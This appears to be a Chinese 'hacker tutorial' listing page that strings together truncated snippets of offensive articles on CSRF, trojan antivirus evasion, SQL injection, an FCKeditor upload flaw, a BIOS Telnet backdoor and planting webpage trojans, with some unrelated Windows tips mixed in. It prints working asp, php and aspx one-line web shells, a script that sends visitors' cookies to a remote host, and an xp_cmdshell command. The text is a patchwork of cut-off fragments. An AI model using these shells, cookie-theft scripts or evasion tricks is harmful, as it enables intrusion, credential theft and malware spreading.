黑客教程

0x01 什么是CSRF攻击 CSRF是Cross Site Request Forgery的缩写（也缩写为XSRF），直译过来就是跨站请求伪造的意思，也就是在用户会话下对某个CGI做一些GET/POST的事情——这些事情用户未必知道和愿意做，你可以把它想做HTTP会话

ps:请勿用于非法用途，仅供技术研究之用。 by：yunshu 这个东西的主要功能就是去网上一个URL读取配置文件，拿到需要弹出的窗口以及周期时间，然后开始弹……程序安装成服务，并设置为自动启动。启动之后写入一段代码到explorer.exe进程中

常用的木马免杀方法绝招一：快速搞定瑞星文件查杀操作步骤：　第一步：用OD载入，来到程序的入口点。　 ...常用的木马免杀方法 绝招一：快速搞定瑞星文件查杀 操作步骤： 　第一步：用OD载入，来到程序的入口点。 　第二步：把入口点的第一句PUSH　EBP　改成POP　EBP

偷取Cookie，通过以下脚本引入一个js，document.write("<script src=XX.js></script>")，然后js内容为： var code;　　　　　　　　　 var target = "h

Author: Sh@dow 刚才在卫生间蹲着的时候忽然想到这个问题，mysql5.x for linux下面有一个函数，可以帮助我们干很多事情，这个函数4。x下面貌似没，原来一直没发现，也没去查函数手册，就我自己的经验来写点东西。4,x的明天再看看函数手册，再装一个实验一下。

FCKeditor的JSP版漏洞 http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Imag

Structured Query Language即结构化查询语言，用于操作关系型数据库管理系统，本文给大家介绍SQL注入及危害、防御手段的处理方法，感兴趣的朋友跟随小编一起看看吧

章出处:C.R.S.T 作者:sai52[B.H.S.T] blog:www.sai52.com 今天朋友问我如何在mysql下读取文件，把我问愣了，发现自己还是犯了不求甚解的毛病，因此特地查了下mysql使用手册。 思路都一样，在拥有file权限的前提下，读取文件为字

用windows自带功能做永不被查杀，超小体积的下载者！ 利用windows自带功能做永不被查杀，超小体积的下载者！ 今天自己搞出来个永不会被杀的下载者 好东西就要拿出来和大家分享,,, 把制作过程告诉大家吧.... 看不懂的可以加我QQ 523085615 来问我。

得到客户端主机名: select host_name(); 得到服务端主机名: select @@servername; 结果一样就极有可能未分离，结果不一样就是分离的 点评： 在实际的渗透过程中，我们常常会困惑数据库和web究竟是否在一台服务器上，有了这个办法

asp一句话 <%execute(request("1"))%> php一句话 <?php eval($_POST[1]);?> aspx一句话 <script language="C#" run

<script>document.write('<img src="http://url/news.asp?msg='+document.cookie+'" width=0 height=0 border=0 />');</scr

该项目仅为实验性项目，主要目的是想隐藏一个Telnet后门在主板的BIOS内，并让其随着计算机系统及操作系统成功的运行起来。运行后能反向Telnet连接到指定的计算机接受控制。 项目涉及的相关知识及技术目录 1、 实验环境，使用bochs调试工具。 2、 刷新BIOS技术问

其实很简单的的，说到原理，就一个：就是在人家网站的主页那里插入一个自己的网马的页面，等有漏洞的人查看了人家网站的主页，那么他就成了你的肉鸡了。 下面我介绍5种方法，我一个一个介绍 方法一：这个就是最简单的了，只要你懂点html语言 把下面这段代码插进网页中：

i 首先请大家看这么一个简单的小程序： #include <stdio.h> void main() {     int i

文件夹遍历技术是一种非常有用的技术，在文件的搜索以及杀毒软件中都使用了这种技术。以下我将讨论如何在Win32下实现这种技术。 文件夹遍历技术的核心就是使用递归算法，关于递归算法，我这里就不多介绍了，不明白的朋友请找出谭先生的《C程序设计》参阅相关内容。 以下是

呆在家中上网聊天实在不是一件惬意的事：每一天打开QQ，迎接我的都是一串一串的广告……国庆黄金周，连广告也不放过！：（ 无奈，打开Visual C++，开始了我的“反骚扰”之路。 首先我面对的问题是：QQ一共有几种广告，我能

　　“本地连接”突然受限 　　单位局域网中有一台旧计算机，平时安装使用的是Windows XP系统，在该系统环境下该计算机可以正常访问网络;后来，某位同事为了能够在第一时间体验到Windows Vista系统的精彩，特意对该计算机系统进行了升级，不过升

/******* 导出到excel EXEC master..xp_cmdshell 'bcp SettleDB.dbo.shanghu out c:temp1.xls -c -q -S"GNETDATA/GNETDATA" -U"sa&quo

　第一招:屏幕保护 　　在Windows中启用了屏幕保护之后，只要我们离开计算机(或者不操作计算机)的时间达到预设的时间，系统就会自动启动屏幕保护程序，而当用户移动鼠标或敲击键盘想返回正常工作状态时，系统就会打开一个密码确认框，只有输入正确的密码之后才能返回系统，